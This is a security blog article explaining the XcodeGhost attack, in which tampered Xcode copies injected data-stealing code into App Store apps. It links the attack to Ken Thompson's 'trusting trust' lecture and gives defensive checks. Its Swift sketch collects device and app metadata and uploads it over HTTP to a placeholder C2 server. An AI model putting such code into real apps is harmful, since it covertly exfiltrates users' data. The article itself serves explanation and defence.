Apple App Store Hack – Reflections on Trusting Trust

Apple’s app review process is excellent at keeping malware out of its store, but last week proved that even the best security practices can be overcome by inventive fraudsters.

First, security researcher Mark Dowd of Azimuth Security revealed a hole in the AirDrop file-sharing service that could allow malicious software to be installed on an iPhone. Then came reports that Chinese apps hosted on the official Apple App Store contained malicious code capable of stealing information from iPhone users.

According to Palo Alto Networks, this latter incident affects 39 known applications and hundreds of millions of users. The malicious code collects device and app data and uploads it to a command-and-control (C2) server over plain HTTP. The C2 domain names are linked to KeyRaider, an iOS trojan recently found to target jailbroken devices. Further analysis shows the code can also receive commands from the C2 server, enabling more sophisticated mechanisms for collecting user credentials.
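To make that behavior concrete, here is a minimal Swift sketch of the kind of device and app metadata collection and plain-HTTP upload described in the report. The endpoint, payload fields, and function name are illustrative assumptions, not the actual malware code.

```swift
import UIKit

// Sketch of device/app metadata collection and HTTP upload of the kind
// reported by Palo Alto Networks. The endpoint, field names, and function
// name are hypothetical, chosen only for illustration.
func reportDeviceInfo() {
    let device = UIDevice.current
    let payload: [String: String] = [
        "app":      Bundle.main.bundleIdentifier ?? "unknown",
        "name":     device.name,
        "model":    device.model,
        "os":       "\(device.systemName) \(device.systemVersion)",
        "language": Locale.preferredLanguages.first ?? "unknown",
    ]

    // Plain HTTP, as in the reported attack -- no TLS, so the traffic is
    // also visible to anyone on the network path.
    var request = URLRequest(url: URL(string: "http://c2.example.com/report")!)
    request.httpMethod = "POST"
    request.setValue("application/json", forHTTPHeaderField: "Content-Type")
    request.httpBody = try? JSONSerialization.data(withJSONObject: payload)

    URLSession.shared.dataTask(with: request).resume()
}
```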

So the question is: how did this attack manage to bypass Apple’s strict app review process?

In 1984, in his acceptance lecture for the ACM Turing Award (often called the Nobel Prize of computer science), titled Reflections on Trusting Trust, Ken Thompson presented what became known as the Ken Thompson Hack. In this short paper, Thompson describes how easily a compiler can be modified to accept new escape sequences, or even to plant a Trojan horse. He concludes with a reflection on something that is still just as relevant to security 30 years later: trust.

The Ken Thompson Hack may be the first documented reference to compiler malware, which is the same mechanism attackers are now using to sneak malicious code into the Apple App Store.

Since it’s a challenge to get malware past Apple’s App Store review team, hackers took a different approach. They embedded malicious code into one of the most used and trusted tools for developers: Xcode, Apple’s integrated development environment (IDE) for building iOS and Mac OS X apps.

Every application links to a set of libraries that allow it to interact with the underlying operating system. This is true on any platform, regardless of the language or framework you use. These libraries usually ship with the software development kit (SDK) or IDE, and developers trust them when building their apps. Security-conscious developers only download SDKs or IDEs from the manufacturer’s official website, but Internet restrictions and slow download speeds in China push many developers to fetch large packages like Xcode from local file-sharing services instead.
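One check that helps regardless of where the installer came from is Gatekeeper’s assessment of the installed bundle; Apple’s guidance after the incident was to run spctl --assess --verbose /Applications/Xcode.app against the installed copy. Below is a small Swift sketch that wraps that check; the function name and default path are assumptions for illustration.

```swift
import Foundation

// Sketch: ask Gatekeeper whether a local Xcode install is still accepted,
// by shelling out to Apple's spctl tool. The function name and install
// path are illustrative assumptions.
func xcodePassesGatekeeper(at path: String = "/Applications/Xcode.app") -> Bool {
    let spctl = Process()
    spctl.executableURL = URL(fileURLWithPath: "/usr/sbin/spctl")
    spctl.arguments = ["--assess", "--verbose", path]
    do {
        try spctl.run()
        spctl.waitUntilExit()
        // Exit status 0 means the bundle was accepted (e.g. "source=Apple").
        return spctl.terminationStatus == 0
    } catch {
        return false
    }
}
```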

In this case, criminals took several legitimate versions of Xcode, replaced parts of its core libraries with rogue versions, and shared the seemingly legitimate copies on popular Chinese developer forums.

The trick is replacing or adding Mach-O object files that the LLVM linker consumes when building an iOS app. An object file contains machine code in relocatable form; it is not executable on its own until the linker combines it into a finished binary. The linker uses these files without any verification beyond checking that they conform to the expected format, so attackers who manage to replace them can inject malicious code without altering the usual behavior of a legitimate app, and the malware goes unnoticed during the review process.
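To see how thin that format check is, here is a short Swift sketch that reads a Mach-O header and reports whether a file is a 64-bit relocatable object, the kind of input the linker accepts. The header says nothing about where the code came from or what it does; the function name and example path are hypothetical.

```swift
import Foundation
import MachO   // for the mach_header_64 layout

// Sketch: check whether a file is a 64-bit relocatable Mach-O object
// (the kind of file the linker consumes). Nothing in this header records
// the code's origin -- only that the format is what the linker expects.
func isRelocatableObject(path: String) -> Bool {
    let machMagic64: UInt32 = 0xfeedfacf   // MH_MAGIC_64
    let objectFileType: UInt32 = 0x1       // MH_OBJECT (relocatable object)

    guard let data = FileManager.default.contents(atPath: path),
          data.count >= MemoryLayout<mach_header_64>.size else {
        return false
    }
    let header = data.withUnsafeBytes { $0.load(as: mach_header_64.self) }
    return header.magic == machMagic64 && header.filetype == objectFileType
}

// Example: prints true for a freshly compiled .o file, false otherwise.
print(isRelocatableObject(path: "/tmp/example.o"))
```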

Although the iOS and Mac sandboxes prevent the altered code from causing major damage to the device, the infected apps can still read contact information, collect location data, access the camera, or use any other permission granted to the legitimate app. Consider the trend of even simple apps requesting more and more permissions and you get some idea of the scope of this attack. Tencent’s hugely popular WeChat app, for example, was among those infected.

You can blame human foolishness (as some have already done), but the truth is that security is always about us, and human-originated flaws will remain a security problem. How many of us have downloaded productivity add-ons for our IDE, browser, or office suite without performing the verification steps we know we should?

These kinds of attacks pose a larger threat because they bypass protections based on code signing. If an attacker manages to infiltrate a legitimate developer’s toolkit, the resulting code will be legitimately signed by that developer, even though it carries malware.

Time will tell how manufacturers react to this latest attack. Some will probably introduce new verification rules for every object module a linker consumes, but even then it will only be a matter of time before those checks are compromised too. In the end, everything still comes down to trust.

As Ken Thompson put it: “The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.)”
